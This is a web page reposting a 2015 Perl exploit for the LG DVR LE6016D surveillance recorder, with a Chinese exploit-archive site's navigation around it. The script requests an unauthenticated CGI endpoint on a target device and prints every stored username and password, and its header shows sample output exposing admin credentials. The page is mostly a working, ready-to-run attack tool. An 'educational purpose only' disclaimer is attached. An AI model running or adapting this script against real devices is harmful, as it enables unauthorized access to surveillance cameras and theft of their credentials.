LG DVR LE6016D - Unauthenticated Remote Users/Passwords Disclosure Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

LG DVR LE6016D - Unauthenticated Remote Users/Passwords Disclosure Exploit

来源：todor.donev at gmail.com 作者：Donev 发布时间：2015-02-11

#!/usr/bin/perl

#

# LG DVR LE6016D unauthenticated remote

# users/passwords disclosure exploit

#

# <todor.donev at gmail.com>

# http://www.ethical-hacker.org/

####

#

# Digital video recorder (DVR) surveillance is the use of cameras,

# often hidden or concealed, that use DVR technology to record

# video for playback or immediate viewing. As technological

# innovations have made improvements in the security and

# surveillance industry, DVR surveillance has become more

# prominent and allows for easier and more versatile security

# systems in homes and businesses. A DVR surveillance security

# system can be designed for indoor use or outdoor use and can

# often involve hidden security cameras, concealed “nanny cams”

# for home security, and even personal recording devices hidden

# on a person.

#

####

#

# Description:

# No authentication (login) is required to exploit this vulnerability.

# This program demonstrates how unpatched security bug would enable

# hackers to gain control of a vulnerable device while sitting

# behind their keyboard, potentially thousands of miles away.

# An unauthenticated attacker that is connected to the DVR's may be

# able to retrieve the device's administrator password allowing them

# to directly access the device's configuration control panel.

#

####

#

# Disclaimer:

# This or previous programs is for Educational purpose ONLY. Do not

# use it without permission.The usual disclaimer applies, especially

# the fact that Todor Donev is not liable for any damages caused by

# direct or indirect use of the information or functionality provided

# by these programs. The author or any Internet provider bears NO

# responsibility for content or misuse of these programs or any

# derivatives thereof. By using these programs you accept the fact

# that any damage (dataloss, system crash, system compromise, etc.)

# caused by the use of these programs is not Todor Donev's

# responsibility.

#

####

# Use them at your own risk!

####

#

# $ perl lg.pl 133.7.133.7:80

# LG DVR LE6016D unauthenticated remote

# users/passwords disclosure exploit

# u/p: admin/000000

# u/p: user1/000000

# u/p: user2/000000

# u/p: user3/000000

# u/p: LOGOUT/000000

# <todor.donev at gmail.com>

# http://www.ethical-hacker.org/

#

####

use LWP::Simple;

print " LG DVR LE6016D unauthenticated remote\n users/passwords disclosure exploit\n";

if (@ARGV == 0) {&usg; &foot;}

while (@ARGV > 0) {

$t = shift(@ARGV);

}

my $r = get("http://$t/dvr/wwwroot/user.cgi") or die("Error $!");

for (my $i=0; $i <= 4; $i++){

if ($r =~ m/<name>(.*)<\/name>/g){

print " u\/p: $1\/";

}

if ($r =~ m/<pw>(.*)<\/pw>/g){

print "$1\n";

}

&foot;

sub usg(){

print "\n Usage: perl $0 <target:port>\n Example: perl $0 133.7.133.7:80\n\n";

}

sub foot(){

print " http://www.ethical-hacker.org/\n";

exit;

}

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告